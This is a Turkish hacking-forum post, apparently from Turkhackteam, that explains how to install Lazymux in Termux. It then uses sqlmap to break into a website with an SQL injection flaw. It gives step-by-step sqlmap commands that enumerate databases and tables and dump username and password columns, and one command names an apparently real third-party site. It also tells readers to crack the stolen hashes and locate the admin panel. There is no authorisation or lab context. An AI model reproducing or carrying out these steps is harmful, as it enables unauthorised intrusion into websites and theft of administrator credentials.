Termux lazymux kurulumu ve kullanımı

SomethingWentWrong

Yeni üye
18 Haz 2021
29
6
24
Manisa
apt update
pkg install git
pkg install python

pkg install python2

Paketi kurmak istediğinizde izin isteyecektir [Y/N] diye. Y yazıp enter basın.
Şimdi sıra programları kurmakta.

git clone https://github.com/Gameye98/Lazymux.git

Tekrar paket kurulumu istediğinde Y yazıp enter basın.

python2 lazymux.py

Bu komut çalışmazsa python2 yerine python yazın.

Size bir liste gelicek "Web Hacking" hangi sayıdaysa onu yazın 01 veya 05 gelir. Hangisi geldiyse o sayıyı yazıp enter basınız.

Karşımıza tekrardan bir liste gelicek bunlar programlar bize lazım olan program sqlmap. Yüksek ihtimal ilk sırada gelir

01 yazın enter basın.

Yüklendikten sonra 2 adet yazı çıkıcak. 00 yazıp enter basın.

Çıktıktan sonra

cd
ls
cd sqlmap
ls


Bir kaç dosya gözükücek bize lazım olan dosya sqlmap.py
Çalıştırmadan önce yapacağınız işlem şöyle
Sql açığı tespit ettiğimiz sitenin databasesine giricez.


Bunun için komut satırına

python2 sqlmap.py -u http://www.hedefsite.com/index.php?id= --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs

hedef sitenin sql açığı bulduğunuz bölümün url sini giriniz örnek ;

http://www.site.com/index.php?id=41

Yukarıdaki komutu girip entera bastığınız anda sql açıklı websitesini tarayıp databasesine girecektir. Bu tarama biraz uzun sürebilir.

Tarama bittikten sonra databaseler ekrana gelicektir.
[+]information_schema
[+]w3bdb


Databaseden tabloları çekmek için komut satırına

python2 sqlmap.py -u http://www.hedefsite.com/index.php?id=41 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 databaseismi --tables

Yukarıdaki komutu yazdıktan sonra size databasede bulunan tabloları listeleyecektir. Bu liste çok uzun olabilir ve admin bilgilerini bulmanızı zorlaştırabilir.

Örnek olarak

information_schema da bulunan tablolar

-------------------------------
TABLE_NAMES
USER_PRİVİLEGES
vsvs

---------------------------

Diyelimki admin user pass olan tabloyu buldunuz
Tablodaki verileri çekmek için ise komut satırına ;


python2 sqlmap.py -u "http://cordoganclark.com/newsitem.php?id=8" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 -D databaseismi -T tabloismi -C username,password --dump

Bu komutu yazıyorsunuz. Sizde veri isimleri değişik olabilir ben örnek olarak yazdım.
Ekrana şöyle bir çıktı geldi varsayalım ;


-------------------------------------
username . a2dbnsjeia245
password. 243ma2134666
------------------------------------
Böyle bir sonuç çıkarsa hash killer ile md5 şifrelenmis bilgileri bulabilirsiniz. Admin paneli bulmak için yüklediğimiz lazymux programinda mevcut programlar var onlari kullanabilirsiniz.

Konuyla alakalı bir başka diğer konuya ulaşmak isterseniz burada bulunan alttaki linkten tıklayarak ulaşabilirsiniz


İyi forumlar dilerim herkese..​
 
Son düzenleme:

SomethingWentWrong

Yeni üye
18 Haz 2021
29
6
24
Manisa
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.